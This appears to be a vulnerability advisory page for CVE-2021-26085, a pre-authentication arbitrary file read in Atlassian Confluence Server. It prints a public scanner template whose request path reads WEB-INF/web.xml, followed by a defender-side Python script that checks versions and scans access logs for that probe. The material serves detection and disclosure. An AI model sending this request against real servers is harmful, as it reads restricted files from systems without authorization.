Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.
PoC code [public]
id: CVE-2021-26085
info:
  name: Confluence Pre-Authorization Arbitrary File Read
  author: wulalalaaa
  severity: medium
  description: |-
    Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26085
  tags: cve,cve2021,confluence,arbitrary-file-read
  created: 2021/04/20
set:
  rand: randomLowercase(6)
rules:
  r0:
    request:
      method: GET
      path: /s/{{rand}}/_/;/WEB-INF/web.xml
    expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
expression: r0()
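
A defender-side check built from the details above, added here as an example (not part of the original template or Atlassian's code): it tests a version string against the stated affected ranges and scans access-log lines for the request shape the rule sends. The function names, the combined-log layout and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote

def is_affected(version: str) -> bool:
    """True if a Confluence Server version falls in the ranges stated above:
    before 7.4.10, or from 7.5.0 up to (not including) 7.12.3."""
    parts = tuple(int(p) for p in version.split("."))
    v = (parts + (0, 0, 0))[:3]          # pad "7.5" to (7, 5, 0)
    return v < (7, 4, 10) or (7, 5, 0) <= v < (7, 12, 3)

# Request shape from the template: /s/<token>/_/;/WEB-INF/...
PROBE = re.compile(r"^/s/[^/]+/_/;/WEB-INF/", re.IGNORECASE)

# Assumed log layout: Apache/Tomcat "combined" style access log.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def find_probes(lines):
    """Return (client, raw target, status) for requests matching the probe shape.
    The path is percent-decoded first so an encoded ';' (%3b) is still caught."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = unquote(m["target"].split("?", 1)[0])
        if PROBE.match(path):
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [20/Apr/2021:10:00:01 +0000] "GET /s/abcdef/_/;/WEB-INF/web.xml HTTP/1.1" 200 9876',
    '192.0.2.11 - - [20/Apr/2021:10:00:02 +0000] "GET /s/qwerty/_/%3b/WEB-INF/web.xml HTTP/1.1" 404 512',
    '198.51.100.7 - - [20/Apr/2021:10:00:03 +0000] "GET /s/d41d8c/8703/_/styles/main.css HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, target, status in find_probes(SAMPLE):
        note = "file served, escalate" if status == 200 else "blocked or not found"
        print(f"{ip} {status} {target} ({note})")
    for ver in ("7.4.9", "7.4.10", "7.12.2", "7.12.3"):
        print(ver, "affected" if is_affected(ver) else "not affected")
```

A matching request answered with status 200 means the file was returned to an unauthenticated client and the host should be treated as exposed until it is upgraded to 7.4.10, 7.12.3 or later.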